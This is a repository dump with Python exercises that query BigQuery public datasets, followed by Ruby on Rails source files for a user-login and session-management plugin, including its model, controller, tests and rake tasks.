speeds_investigation_result = speeds_investigation_query_job.to_dataframe()
<file_sep>from google.cloud import bigquery
# Create a "Client" object
client = bigquery.Client()
# Construct a reference to the "stackoverflow" dataset
dataset_ref = client.dataset("stackoverflow", project="bigquery-public-data")
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# List all the tables in the "stackoverflow" dataset
tables = list(client.list_tables(dataset))
# get list of tables
tables = [table.table_id for table in tables]
# Construct a reference to the "posts_answers" table
answers_table_ref = dataset_ref.table("posts_answers")
# API request - fetch the table
answers_table = client.get_table(answers_table_ref)
# Preview the first five lines of the "posts_answers" table
client.list_rows(answers_table, max_results=5).to_dataframe()
# Construct a reference to the "posts_questions" table
questions_table_ref = dataset_ref.table("posts_questions")
# API request - fetch the table
questions_table = client.get_table(questions_table_ref)
# Preview the first five lines of the "posts_questions" table
client.list_rows(questions_table, max_results=5).to_dataframe()
# Construct the query
questions_query = """
SELECT id, title, owner_user_id
FROM `bigquery-public-data.stackoverflow.posts_questions`
WHERE tags LIKE '%bigquery%'
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 2 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=20**9)
questions_query_job = client.query(questions_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
questions = questions_query_job.to_dataframe()
# Construct the query # check why it returns an error. Seems to come from FROM to parent_id
# is it linked to the tabs? Seems to come from a space put after "AS q" (how come it influences the result???)
answers_query = """
SELECT a.id, a.body, a.owner_user_id
FROM `bigquery-public-data.stackoverflow.posts_questions` AS q
INNER JOIN `bigquery-public-data.stackoverflow.posts_answers` AS a
ON q.id = a.parent_id
WHERE q.tags LIKE '%bigquery%'
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 1 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
answers_query_job = client.query(answers_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
answers_results = answers_query_job.to_dataframe()
"""
# here is a query that works.....
answers_query = """
SELECT a.id, a.body, a.owner_user_id
FROM `bigquery-public-data.stackoverflow.posts_questions` AS q
INNER JOIN `bigquery-public-data.stackoverflow.posts_answers` AS a
ON q.id = a.parent_id
WHERE q.tags LIKE '%bigquery%'
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 1 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**9)
answers_query_job = client.query(answers_query, job_config=safe_config)
# API request - run the query, and return a pandas DataFrame
answers_results = answers_query_job.to_dataframe()
"""
# Careful with tab: should align with """?
# Need to group by a.owner_user_id instead of user_id?
# why is it on ON q.id = a.parent_Id (wih Capital I) and not ON q.id = a.parent_id?
bigquery_experts_query = """
SELECT a.owner_user_id AS user_id, COUNT(1) AS number_of_answers
FROM `bigquery-public-data.stackoverflow.posts_questions` AS q
INNER JOIN `bigquery-public-data.stackoverflow.posts_answers` AS a
ON q.id = a.parent_id
WHERE q.tags LIKE '%bigquery%'
GROUP BY a.owner_user_id
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 1 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**9)
bigquery_experts_query_job = client.query(bigquery_experts_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
bigquery_experts_results = bigquery_experts_query_job.to_dataframe()
# get topic
topic = 'python'
# define function (and sort by descending number of answers)
def list_experts(topic):
# Construct the query
topic_experts_query = """
SELECT a.owner_user_id AS user_id, COUNT(1) AS number_of_answers
FROM `bigquery-public-data.stackoverflow.posts_questions` AS q
INNER JOIN `bigquery-public-data.stackoverflow.posts_answers` AS a
ON q.id = a.parent_Id
WHERE q.tags LIKE '%{}%'
GROUP BY a.owner_user_id
ORDER BY number_of_answers DESC
""".format(topic)
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 2 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=20**9)
topic_experts_query_job = client.query(topic_experts_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
topic_experts_results = topic_experts_query_job.to_dataframe()
# Preview results
print(topic_experts_results.head())
# get results
list_experts(topic)
"""
# code in the solution...
bigquery_experts_query = """
SELECT a.owner_user_id AS user_id, COUNT(1) AS number_of_answers
FROM `bigquery-public-data.stackoverflow.posts_questions` AS q
INNER JOIN `bigquery-public-data.stackoverflow.posts_answers` AS a
ON q.id = a.parent_Id
WHERE q.tags LIKE '%bigquery%'
GROUP BY a.owner_user_id
"""
"""
<file_sep>from google.cloud import bigquery
# Create a "Client" object
client = bigquery.Client()
# Construct a reference to the "github_repos" dataset
dataset_ref = client.dataset("github_repos", project="bigquery-public-data")
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# Construct a reference to the "licenses" table
licenses_ref = dataset_ref.table("licenses")
# API request - fetch the table
licenses_table = client.get_table(licenses_ref)
# Preview the first five lines of the "licenses" table
client.list_rows(licenses_table, max_results=5).to_dataframe()
# Construct a reference to the "sample_files" table
files_ref = dataset_ref.table("sample_files")
# API request - fetch the table
files_table = client.get_table(files_ref)
# Preview the first five lines of the "sample_files" table
client.list_rows(files_table, max_results=5).to_dataframe()
# Construct the query
file_count_by_license_query = """
SELECT l.license AS license, COUNT(1) AS num_files
FROM `bigquery-public-data.github_repos.licenses` AS l
INNER JOIN `bigquery-public-data.github_repos.sample_files` AS s
ON l.repo_name = s.repo_name
GROUP BY license
ORDER BY num_files DESC
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
file_count_by_license_query_job = client.query(file_count_by_license_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
file_count_by_license = file_count_by_license_query_job.to_dataframe()
<file_sep>
# import libraries
from google.cloud import bigquery
# create a client object
client = bigquery.Client()
### --------------------------------------------------------------------------
### SELECT FROM
### --------------------------------------------------------------------------
# Construct a reference to the "hacker_news" dataset
dataset_ref = client.dataset("hacker_news", project="bigquery-public-data")
# https://openaq.org/#/?_k=esd1sb
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# construct a reference to the "comments" table
table_ref = dataset_ref.table("comments")
# API request - fetch the table
table = client.get_table(table_ref)
# Print information on all the columns in the "comments" table in the "hacker_news" dataset
table.schema
# Print information on all the columns in the "comments" table in the "hacker_news" dataset
client.list_rows(table, max_results = 5).to_dataframe()
# query
query = """
SELECT parent, COUNT(id)
FROM `bigquery-public-data.hacker_news.comments`
GROUP BY parent
HAVING COUNT(id) > 10
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 1 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**9)
query_job = client.query(query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
popular_comments = query_job.to_dataframe()
# Print the first five rows of the DataFrame
popular_comments.head()
### --------------------------------------------------------------------------
### ALIASING AND OTHER IMPROVEMENTS
### --------------------------------------------------------------------------
# query
query = """
SELECT parent, COUNT(1) AS NumPosts
FROM `bigquery-public-data.hacker_news.comments`
GROUP BY parent
HAVING COUNT(1) > 10
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 1 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**9)
query_job = client.query(query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
popular_comments = query_job.to_dataframe()
# Print the first five rows of the DataFrame
popular_comments.head()
<file_sep>
# import libraries
from google.cloud import bigquery
# create a client object
client = bigquery.Client()
### --------------------------------------------------------------------------
### Fetch data from bigquery-public-data
### --------------------------------------------------------------------------
# Construct a reference to the "hacker_news" dataset
dataset_ref = client.dataset("hacker_news", project="bigquery-public-data")
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# List all the tables in the "hacker_news" dataset
tables = list(client.list_tables(dataset))
# print list of tables
for table in tables:
print(table.table_id)
# construct a reference to the "full" table
table_ref = dataset_ref.table("full")
# API request - fetch the table
table = client.get_table(table_ref)
# Print information on all the columns in the "full" table in the "hacker_news" dataset
table.schema
# Preview the first five lines of the "full" table
client.list_rows(table, max_results = 5).to_dataframe()
### --------------------------------------------------------------------------
### SELECT FROM
### --------------------------------------------------------------------------
# Construct a reference to the "openaq" dataset
dataset_ref = client.dataset("openaq", project="bigquery-public-data")
# https://openaq.org/#/?_k=esd1sb
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# construct a reference to the "global_air_quality" table
table_ref = dataset_ref.table("global_air_quality")
# API request - fetch the table
table = client.get_table(table_ref)
# Print information on all the columns in the "global_air_quality" table in the "openaq" dataset
table.schema
# Print information on all the columns in the "global_air_quality" table in the "openaq" dataset
client.list_rows(table, max_results = 5).to_dataframe()
# query
query = """
SELECT city
FROM `bigquery-public-data.openaq.global_air_quality`
WHERE country = 'US'
"""
| ddbf4b948a8331ad5b379b2cac420592d52d751a | [
"Markdown",
"Python"
] | 9 | Markdown | linetonthat/sqlbigquery | 52d827705c46cd694b1d19c4940f6ec326fa1409 | 6e20af5beaf76c558b6bab42ad99ccd213acf8e4 |
refs/heads/master | <file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# A user is the identity of someone who has access to the site.
# It is not an authentication mechanism.
#
class User < ActiveRecord::Base
has_many :sessions
before_create :mark_as_verified_if_email_verification_not_required
before_create :set_security_token_if_needed
before_create :set_default_nickname
before_save :set_lowercase_login
validate :presence_of_email_if_required_or_explicitly_validated
validates_presence_of :login
validates_uniqueness_of :login,
:case_sensitive => false,
:identifier => 'unique_login'
validates_uniqueness_of :email,
:allow_blank => true,
:identifier => 'unique_email'
validates_uniqueness_of :security_token,
:allow_blank => true,
:identifier => 'unique_security_token'
attr_reader :error_message
attr_protected :security_token, :security_token_created_at
attr_protected :verified, :disabled_from, :disabled_until
named_scope :verified, {:conditions => {:verified => true}}
named_scope :unverified,
{:conditions => ['verified IS NULL OR verified = ?', false]}
named_scope :ordered_by_login, {:order => 'login'}
named_scope :for_login, proc{|l|
{:conditions => {:lowercase_login => l.downcase}}
}
named_scope :for_security_token, proc{|tok|
{:conditions => [
'security_token = ? AND ' +
'(security_token_valid_until >= ? OR security_token_valid_until IS NULL)',
tok, Time.now
]}
}
##
#
# Login is a protected field. It should not be reset once it has been
# committed. Also, we track lowercase_login to compute uniqueness against
# other logins, since we want logins to be case insensitive, so set it here
# as well. Additionally, configuration may specify that we use an
# email address as a login, so set the email address off this field
# if that is the case.
#
def login= new_login
return if UserSystem.email_is_login
# don't allow it to be re-set
if new_record? or login.blank? or new_login.downcase == login.downcase
write_attribute(:login, new_login)
end
end
##
#
# Email can also act as the login name of the user based on configuration
#
# Changing the email when verification is on will mark the record as
# unverified, and wait for the user to verify the new email address.
#
def email= eml
write_attribute :email, eml
if UserSystem.email_is_login
write_attribute :login, eml
end
write_attribute :verified, false if UserSystem.verify_email and !new_record?
end
##
#
# Mark the login time and do some other housekeeping.
# This should be called by each authentication module.
#
def logged_in auth_module
update_attributes(
:last_login => Time.now,
:previous_login => last_login
)
sessions.clear
end
##
#
# Set a new security token and timeout
#
def update_security_token! has_duration=20.minutes
self.security_token = generate_security_token
if has_duration
self.security_token_valid_until = Time.now + has_duration
end
save!
end
##
#
# Mark the record as verified
#
def verify!
update_attribute(:verified, true)
end
##
#
# Override the security_token getter, generate one if none exists
#
def security_token
unless read_attribute(:security_token)
# make sure to save it immedietely if we need to
if new_record?
self.security_token = generate_security_token
else
update_attribute(:security_token, generate_security_token)
end
end
read_attribute(:security_token)
end
# This method is used by authentication modules.
# Make sure the user is validated.
# This can be chained around by other plugins.
def self.authentication_scope
self.verified
end
private
def presence_of_email_if_required_or_explicitly_validated
if UserSystem.verify_email or UserSystem.require_email
errors.add_on_blank :email, "should not be blank"
end
end
def mark_as_verified_if_email_verification_not_required
unless UserSystem.verify_email
self.verified = true
end
end
def set_security_token_if_needed
if UserSystem.verify_email or UserSystem.always_generate_security_token
self.security_token = generate_security_token
end
end
def generate_security_token
diff = UserSystem.maximum_security_token_length - \
UserSystem.minimum_security_token_length
len = rand(diff) + UserSystem.minimum_security_token_length
rv = ''
chrs = UserSystem.security_token_characters
len.times{ rv << chrs[rand(chrs.length)] }
rv
end
def set_lowercase_login
self.lowercase_login = self.login.downcase
end
def set_default_nickname
self.nickname ||= login
end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# UserRedirect handles redirecting users upon login, account creation, and
# other points in the application when performing actions on the user. It is
# only useful when included in a controller. It expects redirect_to to be
# a method to be called if a callback redirects (and hide_action to keep
# callbacks from showing up as actions).
#
# It needs to be extensible so other methods can hook into it. To this end it
# uses ActiveSupport::Callbacks. To add a new callback use
# module MyModuleWithMyCallback
# def my_method user_record
# # check a condition, maybe redirect
# # return non-false to pass on to later callbacks
# end
# end
# UserRedirect.on_redirection :my_method
# UserRedirect.send :include, MyModuleWithMyCallback
# see UserEmailVerificationRedirect for an example
#
module UserRedirect
private
@@callback_names = []
mattr_accessor :callback_names
@@included_in = []
mattr_accessor :included_in
@@inclusive = []
mattr_accessor :inclusive
# This way a callback gets added to us (and everything we will be included
# in later) and to the things we were mixed into before we got the new
# methods.
def self.on_redirection symbol
callback_names << symbol
included_in.each{|x| x.on_redirection(symbol)}
end
# When a class includes this module, we need to remember the class so we can
# add methods that are added to us later on back into it.
# Every module we have included, the class including us should include as well
# so it can have all the methods and any self.included hooks can run.
def self.included kls
# remember this in case other callbacks come online later
included_in << kls
# if we already have other modules providing callbacks, mix them in
inclusive.each{|m| kls.send :include, m}
# introduce callback mojo
# the callbacks are built per including controller
# so one controller may include some others don't
# but each controller get everything mixed directly into UserRedirect
kls.send :include, ActiveSupport::Callbacks
kls.send :define_callbacks, :on_redirection
kls.send :hide_action, :callback_names, :callback_names=,
:included_in, :included_in=,
:run_callbacks
callback_names.each{|x| kls.on_redirection(x)}
end
# When we include something, we remember it so we can include it into
# everything else later on, and we inlcude it in anything we're already in.
def self.include mod
super
included_in.each{|c| c.send(:include, mod)}
inclusive << mod
end
# Walk through all the callbacks that have been registered until
# one redirects.
def user_redirect user_record
self.class.on_redirection_callback_chain.each do |callback|
rv = callback.call(self, user_record)
break if performed?
end
go_back unless performed?
go_to_default unless performed?
end
# Redirect back to stored location, if any
def go_back
if session[:last_params]
redirect_to session[:last_params]
session[:last_params] = nil
end
end
# Go to a configurable default, or just root_path
def go_to_default
if p = UserSystem.default_path
v = p.is_a?(Symbol) ? send(p) : p
redirect_to(v)
else
redirect_to root_path
end
end
end
##
# A module to check email verification that is mixed into UserRedirect
#
module UserEmailVerificationRedirect
def verify_email user_record
if UserSystem.verify_email and !user_record.verified
redirect_to request_verification_user_path(user_record)
end
end
end
UserRedirect.on_redirection :verify_email
UserRedirect.include UserEmailVerificationRedirect
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
require File.join(File.dirname(__FILE__), '..', 'user_system_test_helper')
context 'The Login Filter', ActiveSupport::TestCase do
setup do
class M < ActionController::Base
include UserSystemLoginFilters
end
@kls = M.new
@user = Factory(:user)
@session = Session.create!(:user => @user)
@kls.stubs(:session).returns({:session_id => @user.id})
end
it 'should return the current user from the session' do
assert_equal @user, @kls.send(:current_user)
end
it 'should have a filter to require login' do
# nasty, but we're not in a real controller
@kls.stubs(:session).returns({})
@kls.stubs(:params).returns({})
@kls.stubs(:new_session_url).returns('NEW_SESSION_URL')
@kls.expects(:redirect_to).with('NEW_SESSION_URL')
@kls.send(:require_login)
end
end
context 'A class incliding the login filters', ActiveSupport::TestCase do
setup do
class Kls < ActionController::Base ; include UserSystemLoginFilters ; end
@kls = Kls
@user = Factory(:user)
end
it 'can request only certain users to have access to controller' do
@kls.expects(:before_filter)
@kls.send(:only_for_user, @user)
end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
require File.join(File.dirname(__FILE__), '..', 'user_system_test_helper')
# because this is an implementation detail, dont rely on it. move it to func
def assert_logged_in specific_user=nil
if specific_user
assert_equal specific_user.id, session[:user_id]
else
assert session[:user_id]
end
end
def assert_not_logged_in
assert_nil session[:user_id]
end
context 'Sessions Controller', ActionController::TestCase do
setup do
@controller = SessionsController.new
@request = ActionController::TestRequest.new
@response = ActionController::TestResponse.new
@user = Factory(:user)
@user.verify!
end
xit 'should log a valid user in with create' do
post 'create', :session => {:login => 'chester', :passphrase => '<PASSWORD>'}
assert_logged_in @user
end
xit 'should log in a disabled user, but sandbox them' do
@user.disable!
post 'create', :session => {:login => 'chester', :passphrase => '<PASSWORD>'}
assert_logged_in
assert_redirected_to inform_disabled_user_path(@user)
end
xit 'should not log in a user with improper credentials' do
post 'create', :session => {:login => 'chester', :passphrase => '<PASSWORD>'}
assert_not_logged_in
end
xit 'should log out user with destroy' do
@request.session[:user_id] = @user.id
post 'destroy'
assert_not_logged_in
end
context 'If verify_emails is on', ActionController::TestCase do
setup do
UserSystem.verify_email = true
end
xit 'should not log in an unverified email' do
@user.update_attribute :verified, false
post 'create', :session => {:login => 'chester', :passphrase => '<PASSWORD>'}
assert_not_logged_in
end
end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
##
#
# == Overview
#
# SessionsController performs authentication and is configurable by
# writing some inheritable attributes or by inheriting from it.
#
# Most of the heavly lifting is done in UserAuthentication, which looks
# at the configuration you specify and calls into the appropriate
# authentication backend.
#
# It is possible to have many subclasses of SessionsController in your
# application, each providing a different mechanism for authentication.
#
# == Example of single authentication endpoint
#
# Example using an initializer to set authentication mechanism, in
# this case using twitter oauth authentication to access the site:
#
# <tt>config/initializers/session_auth.rb</tt>
#
# SessionsController.write_inheritable_attribute(
# :auth_module,
# UserSystem::TwitterOauth::Authentication
# )
#
# == Adding a second authentication endpoint
#
# Example using a subclass to provide an authentication mechanism, in this
# case using a single sign on server:
#
# <tt>app/controllers/sso_sessions_controller.rb</tt>
#
# class SsoSessionsController < SessionsController
# write_inheritable_attribute(:auth_module, Sso::UserSystemAuthentication)
# end
#
# == Example of directing different controllers to different endpoints
#
# Example telling InternalDataController to use SsoSessionsController, and
# MemberDataController will still use SessionsController.
#
# class InternalDataController < ApplicationController
# write_inheritable_attribute(
# :login_url_helper,
# :new_sso_sessions_path
# )
# write_inheritable_attribute(
# :login_post_url_helper,
# :sso_sessions_path
# )
# write_inheritable_attribute(
# :login_template,
# '/sso_auth/new'
# )
# end
#
# == Creating an auth module
#
# Auth modules that SessionsController use for authentication should provide
# a self.login(this_controller) method. There are a number of methods in
# the calling controller that it can make use of:
#
# * this_controller.params
#
# From UserAuthentication
# * this_controller.send(:user_scope)
#
# From UserSystemLoginFilters
# * this_controller.send(:session_model_for_this_controller)
# * this_controller.send(:user_model_for_this_controller)
#
# == Authenticating from a different model
#
# class PhysicianDocumentsController < ApplicationController
# write_inheritable_attribute(
# :login_url_helper,
# :new_physician_sessions_path
# )
# write_inheritable_attribute(
# :login_post_url_helper,
# :physician_sessions_path
# )
# write_inheritable_attribute(
# :user_model,
# :physician
# )
# end
#
# class PhysicianSessionsController < SessionsController
# write_inheritable_attribute(
# :user_model,
# :physician
# )
# end
#
class SessionsController < ApplicationController
skip_before_filter :require_login
# DEFAULT CONFIGURATION
# self.auth_module = PasswordAuthentication
# self.session_model = Session
# self.user_model = User
# self.login_url = nil
# self.login_url_helper = :sessions_url
# self.login_template = '/sessions/new'
include UserAuthentication
include UserRedirect
def new
render :template => login_template_for_this_controller
end
def create
if s = create_session
session[:session_id] = s.id
session[:user_id] = s.user_id
user_redirect(s.user)
else
flash.now[:error] = "Unable to login. " +
"Ensure your login name and passphrase are correct. " +
"Passphrases are case-sensitive"
render :template => login_template_for_this_controller
end
end
def destroy
session[:session_id] = nil
session[:user_id] = nil
render :template => login_template_for_this_controller
end
alias :end :destroy
end
<file_sep>class RemoveUnusedUserFields < ActiveRecord::Migration
def self.up
if User.columns.detect{|x| x.name == 'passphrase'}
remove_column User.table_name, :passphrase
remove_column User.table_name, :reset_passphrase
end
end
def self.down
# do nothing, it is smart enough to skip when unneeded
end
end
<file_sep>#
# You can have an initializer like
# ChainedAuthenticationModule.auth_chain << UrlTokenAuthentication
# ChainedAuthenticationModule.auth_chain << PassowrdAuthentication
# ChainedAuthenticationModule.auth_chain << LocalDevAuth
# SessionsController.auth_module = ChainedAuthenticationModule
#
module ChainedAuthenticationModule
@@auth_chain = []
def self.login controller
@@auth_chain.detect{|x| x.loign(controller) }
end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
begin
require 'rcov/rcovtask'
rescue LoadError
# do nothing
end
namespace :user_system do
desc "Run migrations for the UserSystem Extension"
task :migrate => :environment do
require File.join(File.dirname(__FILE__), '..', '..', 'db', 'user_system_migrator')
UserSystemMigrator.migrate(File.join(File.dirname(__FILE__), '..', '..', 'db', 'migrate'), ENV['VERSION'] ? ENV['VERSION'].to_i : nil)
end
desc 'Test the UserSystem Extension.'
Rake::TestTask.new(:test) do |t|
t.ruby_opts << "-r#{Rails.root}/test/test_helper"
t.libs << File.join(File.dirname(__FILE__), '..', 'lib')
t.pattern = File.join(File.dirname(__FILE__), '..', 'test/**/*_test.rb')
t.verbose = true
end
desc 'Test the UserSystem Extension (only unit tests).'
Rake::TestTask.new('test:units') do |t|
t.ruby_opts << "-r#{Rails.root}/test/test_helper"
t.libs << File.join(File.dirname(__FILE__), '..', 'lib')
t.pattern = File.join(File.dirname(__FILE__), '..', 'test/unit/*_test.rb')
t.verbose = true
end
desc 'Test the UserSystem Extension (only functional tests).'
Rake::TestTask.new('test:functionals') do |t|
t.ruby_opts << "-r#{Rails.root}/test/test_helper"
t.libs << File.join(File.dirname(__FILE__), '..', 'lib')
t.pattern = File.join(File.dirname(__FILE__), '..', 'test/functional/*_test.rb')
t.verbose = true
end
if defined?(Rcov)
desc 'Run code coverate analysis'
Rcov::RcovTask.new do |t|
require 'rbconfig'
t.pattern = File.join(File.dirname(__FILE__), '..', 'test', '**', '*_test.rb')
t.verbose = true
myname = File.dirname(__FILE__).split('/')[-2]
op = Dir[File.dirname(__FILE__) + '/../../*'].map{|x| File.basename(x)}
op.reject!{|x| x == myname}
unless op.empty?
op = op.join(',')
xo = "--exclude-only #{Config::CONFIG['prefix']},config,environment,vendor/rails,#{op},ext_lib,test"
else
xo = "--exclude-only #{Config::CONFIG['prefix']},config,environment,vendor/rails,ext_lib,test"
end
t.rcov_opts = [xo]
end
end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
module UserSystem
mattr_accessor :public_account_creation
self.public_account_creation = true
mattr_accessor :email_is_login
self.email_is_login = false
mattr_accessor :verify_email
self.verify_email = false
mattr_accessor :require_email
self.require_email = false
mattr_accessor :always_generate_security_token
